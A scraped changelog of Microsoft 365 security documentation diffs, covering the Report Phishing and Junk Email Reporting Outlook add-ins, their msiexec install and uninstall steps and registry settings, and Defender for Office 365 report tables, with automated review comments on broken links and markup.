ms.prod: m365-security
ms.mktglfcycl: deploy ms.sitesec: library ms.pagetype: security--++ localization_priority: Normal audience: ITPro
ms.technology: m365d
-# Set up your Microsoft 365 Defender trial lab environment
+# Set up your Microsoft 365 Defender trial in a lab environment
[!INCLUDE [Microsoft 365 Defender rebranding](../includes/microsoft-defender.md)]
ms.technology: m365d
**Applies to:** - Microsoft 365 Defender -
-Creating a Microsoft 365 Defender trial lab or pilot environment and deploying it is a three-phase process:
-
-|[![Phase 1: Prepare](../../medi) |
-|--|--|--|--|
-||*You are here!* | | |
--
-You're currently in the set up phase. Take the initial steps to access Microsoft 365 Security Center then set up your trial lab or pilot environment.
-
-Sign up for an Office 365 or Azure Active Directory subscription to generate a *.onmicrosoft.com* tenant that you can use to sign up for your Microsoft 365 E5 license.
-
->[!NOTE]
->If you already have an existing Office 365 or Azure Active Directory subscription, you can skip the Office 365 E5 trial or pilot tenant creation steps.
-
-In this phase, you'll be guided to:
-- Create an Office 365 E5 trial tenant-- Enable Microsoft 365 trial subscription-
+This topic guides you to set up a dedicated lab environment. For information on setting up a trial in production, see the new [Evaluate and pilot Microsoft 365 Defender](eval-overview.md) guide.
## Create an Office 365 E5 trial tenant >[!NOTE]
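Review bot: the replacement sentence drops two pieces of context without a substitute: the note that readers who already have an Office 365 or Azure Active Directory subscription can skip the trial tenant creation steps, and the explanation that signing up generates a *.onmicrosoft.com tenant used to claim the Microsoft 365 E5 license. The next section, `## Create an Office 365 E5 trial tenant`, still follows immediately, so keep the skip note (or fold it into the new paragraph) so admins with an existing tenant are not led to create a second one.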
security Enable The Report Phish Add In https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/enable-the-report-phish-add-in.md
- Title: "Enable the Report Phish add-in"-- NOCSH-----
-localization_priority: Normal
-- MET150-- MOE150--- M365-security-compliance
-description: "Learn how to enable the Report Phishing add-in for Outlook and Outlook on the web, for individual users or your entire organization."
--
-# Enable the Report Phishing add-in
---
-> [!NOTE]
-> If you're an admin in a Microsoft 365 organization with Exchange Online mailboxes, we recommend that you use the Submissions portal in the Microsoft 365 Defender portal. For more information, see [Use Admin Submission to submit suspected spam, phish, URLs, and files to Microsoft](admin-submission.md).
-
-The Report Message and Report Phishing add-ins for Outlook and Outlook on the web (formerly known as Outlook Web App) enable people to easily report false positives (good email marked as bad) or false negatives (bad email allowed) to Microsoft and its affiliates for analysis.
-
-Microsoft uses these submissions to improve the effectiveness of email protection technologies. For example, suppose that people are reporting many messages using the Report Phishing add-in. This information surfaces in the [Security Dashboard](security-dashboard.md) and other reports. Your organization's security team can use this information as an indication that anti-phishing policies might need to be updated.
-
-You can install either the Report Message or Report Phishing add-in. If you want your users to report both spam and phishing messages, deploy the Report Message add-in in your organization. For more information, see [Enable the Report Message add-in](enable-the-report-message-add-in.md).
-
-The Report Phishing add-in provides the option to report only phishing messages. Admins can enable the Report Phishing add-in for the organization, and individual users can install it for themselves.
-
-If you're an individual user, you can [enable the Report Phishing add-in for yourself](#get-the-report-phishing-add-in-for-yourself).
-
-If you're a global administrator or an Exchange Online administrator, and Exchange is configured to use OAuth authentication, you can [enable the Report Phishing add-in for your organization](#get-and-enable-the-report-phishing-add-in-for-your-organization). The Report Phishing Add-In is now available through [Centralized Deployment](../../admin/manage/centralized-deployment-of-add-ins.md).
-
-## What do you need to know before you begin?
--- The Report Phishing add-in works with most Microsoft 365 subscriptions and the following products:-
- - Outlook on the web
- - Outlook 2013 SP1 or later
- - Outlook 2016 for Mac or later
- - Outlook included with Microsoft 365 apps for Enterprise
- - Outlook app for iOS and Android
--- The Report Phishing add-in is not available for shared mailboxes or mailboxes in on-premises Exchange organizations.--- You can configure reported messages to be copied or redirected to a mailbox that you specify. For more information, see [User submissions policies](user-submission.md).--- Your existing web browser should work with the Report Phishing add-in. But, if you notice the add-in is not available or not working as expected, try a different browser.--- For organizational installs, the organization needs to be configured to use OAuth authentication. For more information, see [Determine if Centralized Deployment of add-ins works for your organization](../../admin/manage/centralized-deployment-of-add-ins.md).--- Admins need to be a member of the Global admins role group. For more information, see [Permissions in the Microsoft 365 Defender portal](permissions-microsoft-365-security-center.md).-
-## Get the Report Phishing add-in for yourself
-
-1. Go to the Microsoft AppSource at <https://appsource.microsoft.com/marketplace/apps> and search for the Report Phishing add-in.
-
-2. Click **GET IT NOW**.
-
-3. In the dialog that appears, review the terms of use and privacy policy, and then click **Continue**.
-
-4. Sign in using your work or school account (for business use) or your Microsoft account (for personal use).
-
-After the add-in is installed and enabled, you'll see the following icons:
--- In Outlook, the icon looks like this:-
- ![Report Phishing add-in icon for Outlook](../../media/Outlook-ReportPhishing.png)
--- In Outlook on the web, the icon looks like this:-
- ![Outlook on the web Report Phishing add-in icon](../../media/OWA-ReportPhishing.png)
-
-## Get and enable the Report Phishing add-in for your organization
-
-> [!NOTE]
-> It could take up to 12 hours for the add-in to appear in your organization.
-
-1. In the Microsoft 365 admin center, go to the go to the **Settings** \> **Add-ins** page at <https://admin.microsoft.com/AdminPortal/Home#/Settings/AddIns>, If you don't see the **Add-in** Page, go to the **Settings** \> **Integrated apps** \> **Add-ins** link on the top of the **Integrated apps** page.
-
-2. Select **Deploy Add-in** at the top of the page, and then select **Next**.
-
- ![Services and add-ins page in the Microsoft 365 admin center](../../media/ServicesAddInsPageNewM365AdminCenter.png)
-
-3. In the **Deploy a new add-in** flyout that appears, review the information, and then click **Next**.
-
-4. On the next page, click **Choose from the Store**.
-
- ![Deploy a new add-in page](../../media/NewAddInScreen2.png)
-
-5. In the **Select add-in** page that appears, click in the **Search** box, enter **Report Phishing**, and then click **Search** ![Search icon](../../media/search-icon.png). In the list of results, find **Report Phishing** and then click **Add**.
-
-6. In the dialog that appears, review the licensing and privacy information, and then click **Continue**.
-
-7. In the **Configure add-in** page that appears, configure the following settings:
-
- - **Assigned users**: Select one of the following values:
-
- - **Everyone** (default)
- - **Specific users / groups**
- - **Just me**
-
- - **Deployment method**: Select one of the following values:
-
- - **Fixed (Default)**: The add-in is automatically deployed to the specified users and they can't remove it.
- - **Available**: Users can install the add-in at **Home** \> **Get add-ins** \> **Admin-managed**.
- - **Optional**: The add-in is automatically deployed to the specified users, but they can choose to remove it.
-
- When you're finished, click **Deploy**.
-
-8. In the **Deploy Report Phishing** page that appears, you'll see a progress report followed by a confirmation that the add-in was deployed. After you read the information, click **Next**.
-
-9. On the **Announce add-in** page that appears, review the information, and then click **Close**.
-
-## Learn how to use the Report Phishing add-in
-
-People who have the add-in assigned to them will see the following icons:
--- In Outlook, the icon looks like this:-
- ![Report Phishing add-in icon for Outlook](../../media/Outlook-ReportPhishing.png)
--- In Outlook on the web, the icon looks like this:-
- ![Outlook on the Web Report Phishing Add-in icon](../../media/OWA-ReportPhishing.png)
-
-## Review or edit settings for the Report Phishing add-in
-
-1. In the Microsoft 365 admin center, go to the go to the **Settings** \> **Add-ins** page at <https://admin.microsoft.com/AdminPortal/Home#/Settings/AddIns>, If you don't see the **Add-in** Page, go to the **Settings** \> **Integrated apps** \> **Add-ins** link on the top of the **Integrated apps** page.
-
-2. Find and select the **Report Phishing** add-in.
-
-3. In the **Edit Report Phishing** flyout that appears, review, and edit settings as appropriate for your organization. When you're finished, click **Save**.
-
-## View and review reported messages
-
-To review messages that users report to Microsoft, you have these options:
--- Use the Admin Submissions portal. For more information, see [View user submissions to Microsoft](admin-submission.md#view-user-submissions-to-microsoft).--- Create a mail flow rule (also known as a transport rule) to send copies of reported messages. For instructions, see [Use mail flow rules to see what users are reporting to Microsoft](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-see-what-users-are-reporting-to-microsoft).
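Review bot: this removes the Report Phishing add-in page outright, yet the Junk Email Reporting article in this same update still links to `enable-the-report-phish-add-in.md` in its opening note, and this page itself cross-links `enable-the-report-message-add-in.md`; a redirect to whichever page now covers the add-in is needed, or those sibling links will break. The admin-relevant requirements stated here should survive wherever that is: organizational deployment needs Exchange configured for OAuth authentication and membership in the Global admins role group, the add-in can take up to 12 hours to appear, and reported messages can be copied to a mailbox through user submissions policies or a mail flow rule.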
security Junk Email Reporting Add In For Microsoft Outlook https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/junk-email-reporting-add-in-for-microsoft-outlook.md
- Title: Install and use the Junk Email Reporting add-in for Microsoft Outlook
- - NOCSH
--- Previously updated : --
-localization_priority: Normal
-
- - M365-security-compliance
-description: Learn how to install and use the Microsoft Junk Email Reporting add-in to report spam, non-spam, and phishing messages to Microsoft.
--
-# Install and use the Junk Email Reporting add-in for Microsoft Outlook
--
-**Applies to**
-- [Exchange Online Protection](exchange-online-protection-overview.md)-- [Microsoft Defender for Office 365 plan 1 and plan 2](defender-for-office-365.md)-- [Microsoft 365 Defender](../defender/microsoft-365-defender.md)-
-> [!NOTE]
-> If you aren't currently using the Junk E-mail Reporting add-in, we recommend the [Report Message add-in](enable-the-report-message-add-in.md) or the [Report Phishing add-in](enable-the-report-phish-add-in.md) instead. For more information, see [Report messages and files to Microsoft](report-junk-email-messages-to-microsoft.md).
-
-The Junk Email Reporting Add-in for Microsoft Outlook allows users to submit false positives (good email marked as spam), false negatives (bad email allowed) and phishing messages to Microsoft. If your organization doesn't use Exchange Online Protection (for example, on-premises Exchange or email services other than Exchange Online), your junk email report submission will not affect your spam filtering.
-
-This topic explains how to install and use the Junk Email Reporting add-in.
-
-## What do you need to know before you begin?
--- To install the Junk Email Reporting add-in, see the [Install the Junk Email Reporting add-in](#install-the-junk-email-reporting-add-in) section later in this article.--- The Junk Email Reporting add-in works with the following versions of Outlook:-
- - Outlook 2013 or later
- - Outlook included with Microsoft 365 Apps for enterprise
--- For more information about reporting messages to Microsoft, see [Report messages and files to Microsoft](report-junk-email-messages-to-microsoft.md).-
-## Use the Junk Email Reporting add-in to report spam and phishing messages
-
-1. For messages in the Inbox or any other email folder except Junk Email, use any of the following methods to report spam and phishing messages:
-
- - Select the message or open the message. In the **Home** or **Message** tab in the ribbon, click **Junk**, and then select **Report as Junk** or **Report as Phishing**.
-
- ![Report junk or phishing email from the ribbon](../../media/junk-email-reporting-ribbon.png)
-
- - Right-click on the message, select **Junk**, and then select **Report as Junk** or **Report as Phishing**.
-
- ![Report junk or phishing email from right-click](../../media/junk-email-reporting-right-click.png)
-
- - Select multiple messages, right-click, and then select **Report as Junk** or **Report as Phishing**.
-
- ![Report multiple junk or phishing email messages from right-click](../../media/junk-email-reporting-right-click-multiple.png)
-
-2. In the dialog that appears, read the information and click **Report**. If you change your mind, click **Don't Report**.
-
- ![Report as junk dialog](../../media/junk-email-reporting-report-as-junk-dialog.png)
-
- ![Report as phishing dialog](../../media/junk-email-reporting-report-as-phishing-dialog.png)
-
-3. The selected messages will be sent to Microsoft for analysis and:
-
- - Moved to the Junk Email folder if it was reported as spam.
- - Deleted if it was reported as phishing.
-
- To confirm that the messages have been submitted, open your **Sent Items** folder to view the submitted messages.
-
-## Use the Junk Email Reporting add-in to report non-spam and phishing messages from the Junk Email folder
-
-1. In the Junk Email folder, use any of the following methods to report spam false positives or phishing messages:
-
- - Select the message or open the message. In the **Home** or **Message** tab in the ribbon, click **Not Junk**, and then select **Report as Not Junk** or **Report as Phishing**.
-
- ![Report not junk or phishing email from the ribbon in the Junk Email folder](../../media/junk-email-reporting-junk-folder-ribbon.png)
-
- - Right-click on the message, click **Junk**, and then select **Report as Not Junk** or **Report as Phishing**.
-
- ![Report not junk or phishing email from right-click in the Junk Email folder](../../media/junk-email-reporting-junk-folder-right-click.png)
-
- - Select multiple messages, right-click, and then select **Report as Not Junk** or **Report as Phishing**.
-
- ![Report multiple not junk or phishing email messages from right-click in the Junk Email folder](../../media/junk-email-reporting-junk-folder-right-click-multiple.png)
-
-2. In the dialog that appears, read the information and click **Report**. If you change your mind, click **Don't Report**.
-
- ![Report as not junk dialog](../../media/junk-email-reporting-report-as-not-junk-dialog.png)
-
- ![Report as phishing dialog](../../media/junk-email-reporting-report-as-phishing-dialog.png)
-
-3. The selected messages will be sent to Microsoft for analysis and:
-
- - Moved to the Junk Email folder if it was reported as spam.
- - Deleted if it was reported as phishing.
-
- To confirm that the messages have been submitted, open your **Sent Items** folder to view the submitted messages.
-
-## Install the Junk Email Reporting add-in
--- You need to have administrator privileges on the computer where you're installing the add-in.--- Go to <https://www.microsoft.com/download/details.aspx?id=18275> and download the appropriate .msi file for your version of Office to a location that's easy to find:-
- - **32-bit**: `Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (32-bit).msi`
- - **64-bit**: `Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (64-bit).msi`
--- For Outlook 2013 or later, the only prerequisite is the Microsoft .NET Framework 2.0. In Windows 10, you don't install the .NET Framework 2.0 from a download.-
-### Install the Junk Email Reporting Add-in using the Setup wizard
-
-1. On your computer, close Outlook.
-
-2. In Windows 10, verify the .NET Framework 2.0 is enabled. For instructions, see [Enable the .NET Framework 3.5 in Control Panel](/dotnet/framework/install/dotnet-35-windows-10#enable-the-net-framework-35-in-control-panel).
-
-3. Locate the .msi file you downloaded and double-click on it.
-
-4. On the **Welcome to Microsoft Junk Email Reporting Add-in Setup** page, click **Next**.
-
-5. Review the license agreement, click **I accept the terms in the License Agreement** if you agree to the terms, and then click **Next**.
-
-6. When the wizard is complete, click **Finish**.
-
-Start Outlook.
-
-Look for the **Junk** button on your Outlook ribbon. You can now report junk email messages to Microsoft by selecting the junk email messages in your Inbox and clicking the **Report Junk** button.
-
-Choose the down arrow next to **Junk** for more options such as **Report as Phishing** if you want to report phishing scam emails to Microsoft. In your junk mail folder, you can also select, **Report not junk** if an email was incorrectly identified as junk mail.
-
-### Install the Junk Email Reporting Add-In using Silent Mode
-
-1. On your computer, close Outlook.
-
-2. In Windows 10, install the .NET Framework 2.0 by running the following command:
-
- ```dos
- DISM /Online /Enable-Feature /FeatureName:NetFx3 /All
- ```
-
-3. To install the add-in without any user interaction, open a Command Prompt and use the following syntax:
-
- ```dos
- msiexec /qn /i "<PathToMSIFile>\<MSIFile>" [MaxMessageSelection=<1-50>] [BccEmailAddress="<EmailAddress1>; <EmailAddress2>"...]
- ```
-
- - `MaxMessageSelection` specifies the maximum number of messages that you can select for a single submission. Valid values are from 1 to 50. The default value is 15.
-
- - `BccEmailAddress` specifies additional Bcc recipients who will receive a copy of all user submissions. The default value is blank (no additional Bcc recipients).
-
- This example installs the 64-bit version of the add-in from the specified path with the default settings.
-
- ```dos
- msiexec /qn /i "C:\Downloads\Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (64-bit).msi"
- ```
-
- This example installs the 32-bit version of the add-in from the specified path with the following additional settings:
-
- - Up to 20 messages can be selected in a single submission.
- - junkreports@contoso.com and hollyd@treyresearch.net receive Bcc copies of all submissions.
-
- ```dos
- msiexec /qn /i "C:\Downloads\Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (32-bit).msi" MaxMessageSelection=20 BccEmailAddress="junkreports@contoso.com; hollyd@treyresearch.net"
- ```
-
-### How do you know this worked?
-
-To verify that you've successfully installed the Junk Email Reporting Add-in, do the any of the following steps in Outlook:
--- Select the message or open the message. In the **Home** or **Message** tab in the ribbon, click **Junk**, and verify that the following options are available:-
- - **Report as Junk**
- - **Report as Phishing**
- - **Junk Reporting Options**
- - **Report Junk Online Help**
-
- ![Report junk or phishing email from the ribbon](../../media/junk-email-reporting-ribbon.png)
--- Right-click on the message, select **Junk**, and verify that the following options are available:-
- - **Report as Junk**
- - **Report as Phishing**
- - **Junk Reporting Options**
- - **Report Junk Online Help**
-
- ![Report junk or phishing email from right-click](../../media/junk-email-reporting-right-click.png)
--- Select multiple messages, right click, and verify that the following options are available:-
- - **Report as Junk**
- - **Report as Phishing**
-
- ![Report multiple junk or phishing email messages from right-click](../../media/junk-email-reporting-right-click-multiple.png)
--- Do the previous actions in the **Junk Email** folder and verify the previous **Junk** reporting options are now **Not Junk**.-
- ![Report not junk or phishing email from the ribbon in the Junk Email folder](../../media/junk-email-reporting-junk-folder-ribbon.png)
-
- ![Report not junk or phishing email from right-click in the Junk Email folder](../../media/junk-email-reporting-junk-folder-right-click.png)
-
- ![Report multiple not junk or phishing email messages from right-click in the Junk Email folder](../../media/junk-email-reporting-junk-folder-right-click-multiple.png)
-
-## Uninstall the Junk Email Reporting Add-in
-
-After you close Outlook, use any of the following procedures to uninstall the Junk Email Reporting Add-in:
--- **Control Panel**: Press the Windows key + R. In the **Run** dialog that opens, enter `control appwiz.cpl` and then click **OK**.-
- Find and select **Microsoft Junk Email Reporting Add-in** in the list, and then click **Uninstall**.
--- **Windows Installer package**: Find or download the appropriate .msi file, and double-click on it.-
- - **32-bit**: `Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (32-bit).msi`
-
- - **64-bit**: `Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (64-bit).msi`
-
- In the dialog that appears, select **Remove Microsoft Junk Email Reporting Add-in for Outlook** and then click **Next**.
--- **Silent Mode**: Find or download the appropriate .msi file. In a Command Prompt window, replace \<PathToFile\> with the location of the .msi file, and run one of the following commands:-
- - **32-bit**:
-
- ```dos
- msiexec /x "<PathToFile>\Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (32-bit).msi" /qn MSIRESTARTMANAGERCONTROL="DisableShutdown"
- ```
-
- - **64-bit**:
-
- ```dos
- msiexec /x "<PathToFile>\Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (64-bit).msi" /qn MSIRESTARTMANAGERCONTROL="DisableShutdown"
- ```
-
-When you open Outlook after the uninstall, the junk, not junk, and phishing reporting options should be gone.
-
-## Troubleshooting the Junk Email Reporting add-in
-
-Occasionally, you might experience trouble with Outlook after adding the Junk Email Reporting Add-In. This section describes problems that you might encounter, along with tips for resolving these issues.
-
-### Troubleshooting for users
-
-You experience one or more of the following problems:
--- Nothing happens when you click **Report Junk**-- Outlook stops responding after you select an email message-- Reported junk mail cannot be delivered due to an "undeliverable" reply-
-To fix this problem, do the following steps:
-
-1. Close and restart Outlook.
-2. Create and send a test message, and verify that the recipient received the message.
-3. If the problem persists, contact your admin.
-
-For other methods that you can use to submit messages to Microsoft, see [Report messages and files to Microsoft](report-junk-email-messages-to-microsoft.md).
-
-### Troubleshooting for admins
-
-#### Problem: An error message continually appears that asks users to contact their system administrator
-
-1. Verify or set the `LoggingLevel` registry key to the value "Verbose":
-
- - **32-bit Outlook on 32-bit Windows**:
-
- ```text
- Windows Registry Editor Version 5.00
-
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Junk Email Reporting\Addins]
- "LoggingLevel"="Verbose"
- ```
-
- - **32-bit Outlook on 64-bit Windows**:
-
- ```text
- Windows Registry Editor Version 5.00
-
- [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Junk Email Reporting\Addins]
- "LoggingLevel"="Verbose"
- ```
-
- - **64-bit Outlook**:
-
- ```text
- Windows Registry Editor Version 5.00
-
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Junk E-mail Reporting\Addins]
- "LoggingLevel"="Verbose"
- ```
-
-2. Restart Outlook and ask users to report back when they see the error message.
-
-3. Collect the log information found at the following location:
-
- `%LOCALAPPDATA%\Microsoft\Junk Email Reporting Add-in\SpamReporterAddinLog.txt`
-
-4. Contact Exchange Online Protection Technical Support and provide them with the log information.
-
-#### Problem: Users selected not to receive a confirmation prompt when they report messages, and now they want the prompt back
-
-1. Create the `ConfirmReportJunk`registry key with the value "True":
-
- ```text
- Windows Registry Editor Version 5.00
-
- HKEY_CURRENT_USER\Software\Microsoft\Junk E-mail Reporting\Preferences]
- "ConfirmReportJunk"="True"
- ```
-
-2. Restart Outlook.
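Review bot: the whole Uninstall and Troubleshooting sections for the Junk Email Reporting Add-in are removed without any visible replacement or redirect, so readers who still have the add-in installed lose the only documented uninstall procedure (the `control appwiz.cpl` and `msiexec /x ... /qn` steps) and the `LoggingLevel` / `SpamReporterAddinLog.txt` troubleshooting path; if the add-in is being retired, add a one-line pointer to the successor guidance (the page already links `report-junk-email-messages-to-microsoft.md`), and if this content is moving to another page, carry it over with two fixes: the `HKEY_CURRENT_USER\Software\Microsoft\Junk E-mail Reporting\Preferences]` line is missing its opening `[`, and the registry paths mix `Junk Email Reporting` (32-bit entries) with `Junk E-mail Reporting` (64-bit and HKCU entries), which should be checked against the actual keys the add-in writes rather than left inconsistent.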
security View Reports For Mdo https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/view-reports-for-mdo.md
In addition to the reports described in this article, several other reports are
|Report|Topic| ||| |**Explorer** (Microsoft Defender for Office 365 Plan 2) or **real-time detections** (Microsoft Defender for Office 365 Plan 1)|[Threat Explorer (and real-time detections)](threat-explorer.md)|
-|**Email security reports**, such as the Top senders and recipients report, the Spoof mail report, and the Spam detections report.|[View email security reports in the Microsoft 365 Defender portal](view-email-security-reports.md)|
-|**Mail flow reports**, such as the Forwarding report, the Mailflow status report, and the Top senders and recipients report.|[Mail flow reports in the new Exchange admin center](/exchange/monitoring/mail-flow-reports/mail-flow-reports)|
-|**URL trace for Safe Links** (PowerShell only). The output of this cmdlet shows you the results of Safe Links actions over the past seven days.|[Get-UrlTrace](/powershell/module/exchange/get-urltrace)|
-|**Mail traffic results for EOP and Microsoft Defender for Office 365** (PowerShell only). The output of this cmdlet contains information about Domain, Date, Event Type, Direction, Action, and Message Count.|[Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport)|
-|**Mail detail reports for EOP and Defender for Office 365 detections** (PowerShell only). The output of this cmdlet contains details about malicious files or URLs, phishing attempts, impersonation, and other potential threats in email or files.|[Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport)|
+|Email security reports that don't require Defender for Office 365|[View email security reports in the Microsoft 365 Defender portal](view-email-security-reports.md)|
+|Mail flow reports in the Exchange admin center (EAC)|[Mail flow reports in the new Exchange admin center](/exchange/monitoring/mail-flow-reports/mail-flow-reports)|
+|
+
+PowerShell reporting cmdlets:
+
+<br>
+
+****
+
+|Report|Topic|
+|||
+|Top senders and recipients|[Get-MailTrafficTopReport](/powershell/module/exchange/get-mailtraffictopreport) <p> [Get-MailTrafficSummaryReport](/powershell/module/exchange/get-mailtrafficsummaryreport)|
+|Top malware|[Get-MailTrafficSummaryReport](/powershell/module/exchange/get-mailtrafficsummaryreport)|
+|Mail traffic|[Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport) <p> [Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport)|
+|Safe Links|[Get-SafeLinksAggregateReport](/powershell/module/exchange/get-safelinksaggregatereport) <p> [Get-SafeLinksDetailReport](/powershell/module/exchange/get-safelinksdetailreport)|
+|Compromised users|[Get-CompromisedUserAggregateReport](/powershell/module/exchange/get-compromiseduseraggregatereport) <p> [Get-CompromisedUserDetailReport](/powershell/module/exchange/get-compromiseduserdetailreport)|
+|Mail flow status|[Get-MailflowStatusReport](/powershell/module/exchange/get-mailflowstatusreport)|
| ## What permissions are needed to view the Defender for Office 365 reports?
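Review bot: the new markup leaves several stray fragments between the two tables that will render as visible debris: the lone `|` row right after the EAC row, the `<br>` and `****` lines before the PowerShell table, and the leading `| ` on the `## What permissions are needed...` heading, which will either break the heading or render as an empty table cell; drop those four fragments so the first table closes cleanly, the "PowerShell reporting cmdlets:" intro stands as a normal paragraph, and the heading starts at column one. Separately, `Get-UrlTrace` disappears from the table with no mention, while the old rows' short descriptions of what each cmdlet returns (for example the Domain, Date, Event Type, Direction, Action, and Message Count fields of `Get-MailTrafficATPReport`) are also dropped; if `Get-UrlTrace` is deprecated in favor of the Safe Links report cmdlets now listed, say so in a sentence, and consider keeping a brief description column so admins can tell the aggregate cmdlets from the detail cmdlets without opening each reference topic.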